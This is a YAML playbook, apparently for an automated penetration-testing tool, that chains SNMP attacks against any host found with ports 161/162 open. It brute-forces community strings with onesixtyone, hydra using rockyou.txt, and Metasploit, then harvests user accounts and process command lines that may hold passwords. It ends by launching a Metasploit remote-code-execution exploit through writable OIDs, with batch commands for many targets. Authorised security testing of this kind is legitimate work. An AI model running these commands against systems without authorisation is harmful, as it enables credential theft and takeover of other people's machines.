id: snmp_pentesting
name: SNMP Penetration Testing (Ports 161, 162)
description: Comprehensive SNMP enumeration, community string brute forcing, and information gathering based on HackTricks methodology
category: enumeration
risk_level: medium
batch_compatible: true

triggers:
  - id: trigger_snmp_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [161, 162, 10161, 10162] }
      protocol: { "$in": ["snmp", "udp"] }
    required_count: 1
    priority: 4
    description: Triggers when SNMP service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: snmp_version_detection
    name: SNMP Version Detection
    description: Identify SNMP version and basic information
    order: 1
    timeout_seconds: 30
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sU -p 161 --script 'snmp* and not snmp-brute' {host} -oN snmp_scan_{host}.txt"
        preferred: true
        notes: "Comprehensive SNMP enumeration with nmap"
        requires_elevation: false
      - tool: onesixtyone
        platforms: [linux, macos]
        command: "onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt {host}"
        preferred: true
        notes: "Fast SNMP community string scanner"
        requires_elevation: false

  - id: snmp_community_brute
    name: SNMP Community String Brute Force
    description: Brute force SNMP community strings (v1/v2c)
    order: 2
    timeout_seconds: 300
    commands:
      - tool: onesixtyone
        platforms: [linux, macos]
        command: "onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {host} -w 100"
        preferred: true
        notes: "Brute force community strings with common wordlist"
        requires_elevation: false
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -P /usr/share/wordlists/rockyou.txt -v {host} snmp"
        preferred: false
        notes: "SNMP password brute force with Hydra"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/snmp/snmp_login; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "Metasploit SNMP community string scanner"
        requires_elevation: false

  - id: snmp_enumeration
    name: SNMP Information Enumeration
    description: Extract system information via SNMP
    order: 3
    timeout_seconds: 180
    commands:
      - tool: snmp-check
        platforms: [linux, macos]
        command: "snmp-check {host} -c {community_string}"
        preferred: true
        notes: "Comprehensive SNMP enumeration tool"
        requires_elevation: false
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} .1"
        preferred: true
        notes: "Walk entire SNMP tree"
        requires_elevation: false
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} NET-SNMP-EXTEND-MIB::nsExtendObjects"
        preferred: false
        notes: "Extract extended SNMP objects"
        requires_elevation: false

  - id: snmp_user_enumeration
    name: SNMP User Account Enumeration
    description: Extract user accounts from Windows systems
    order: 4
    timeout_seconds: 120
    commands:
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.4.1.77.1.2.25"
        preferred: true
        notes: "Enumerate Windows user accounts (MIB 1.3.6.1.4.1.77.1.2.25)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/snmp/snmp_enumusers; set RHOSTS {host}; set COMMUNITY {community_string}; run; exit'"
        preferred: false
        notes: "Metasploit SNMP user enumeration"
        requires_elevation: false

  - id: snmp_process_enumeration
    name: SNMP Process Enumeration
    description: Extract running processes and command lines
    order: 5
    timeout_seconds: 120
    commands:
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.2.1.25.1.6.0"
        preferred: true
        notes: "Enumerate system processes (may contain passwords in command lines)"
        requires_elevation: false
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.2.1.25.4.2.1.2"
        preferred: true
        notes: "Extract running programs"
        requires_elevation: false
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.2.1.25.4.2.1.4"
        preferred: false
        notes: "Extract process paths"
        requires_elevation: false

  - id: snmp_network_enumeration
    name: SNMP Network Configuration
    description: Extract network interfaces and routing information
    order: 6
    timeout_seconds: 120
    commands:
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.2.1.4.34.1.3"
        preferred: true
        notes: "Extract IPv6 addresses (output requires dec2hex conversion)"
        requires_elevation: false
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.2.1.6.13.1.3"
        preferred: true
        notes: "Extract TCP local ports"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/snmp/snmp_enum; set RHOSTS {host}; set COMMUNITY {community_string}; run; exit'"
        preferred: false
        notes: "Metasploit comprehensive SNMP enumeration"
        requires_elevation: false

  - id: snmp_software_enumeration
    name: SNMP Installed Software
    description: Extract list of installed software
    order: 7
    timeout_seconds: 120
    commands:
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.2.1.25.6.3.1.2"
        preferred: true
        notes: "Extract installed software names (Windows)"
        requires_elevation: false
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} 1.3.6.1.2.1.25.2.3.1.4"
        preferred: false
        notes: "Extract storage units"
        requires_elevation: false

  - id: snmp_bulk_extraction
    name: SNMP Bulk Data Extraction
    description: Mass SNMP data collection using snmpbulkwalk
    order: 8
    timeout_seconds: 300
    commands:
      - tool: snmpbulkwalk
        platforms: [linux, macos, windows]
        command: "snmpbulkwalk -c {community_string} -v2c {host} . > snmp_bulk_{host}.txt"
        preferred: true
        notes: "Bulk walk entire SNMP tree (faster than snmpwalk)"
        requires_elevation: false
      - tool: snmpwalk
        platforms: [linux, macos, windows]
        command: "snmpwalk -v2c -c {community_string} {host} NET-SNMP-EXTEND-MIB::nsExtendOutputFull"
        preferred: false
        notes: "Extract extended MIB information (requires download-mibs)"
        requires_elevation: false

  - id: snmp_rce_exploitation
    name: SNMP RCE via Extended MIBs
    description: Test for RCE via writable SNMP OIDs
    order: 9
    timeout_seconds: 180
    commands:
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use exploit/linux/snmp/net_snmpd_rw_access; set RHOSTS {host}; set COMMUNITY {community_string}; run; exit'"
        preferred: true
        notes: "Exploit writable SNMP OIDs for RCE"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sU -p 161 --script snmp-win32-services {host} --script-args snmpcommunity={community_string}"
        preferred: false
        notes: "Enumerate and potentially modify Windows services via SNMP"
        requires_elevation: false

metadata:
  tools:
    - nmap
    - snmpwalk
    - snmpbulkwalk
    - snmp-check
    - onesixtyone
    - hydra
    - metasploit
    - braa
  cves:
    - CVE-2002-0013  # SNMP multiple vendor buffer overflow
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
    - http://oid-info.com/
  techniques:
    - Community string brute forcing
    - MIB walking and OID enumeration
    - Process enumeration (credential harvesting)
    - Network topology discovery
    - RCE via writable OIDs
  batch_commands:
    onesixtyone: "onesixtyone -c community.txt -i {targets_file} -w 100"
    snmp_check: "parallel -j 10 'snmp-check {} -c public > snmp_check_{}.txt' :::: {targets_file}"
    braa: "braa {community_string}@{targets}:.1.3.6.*"
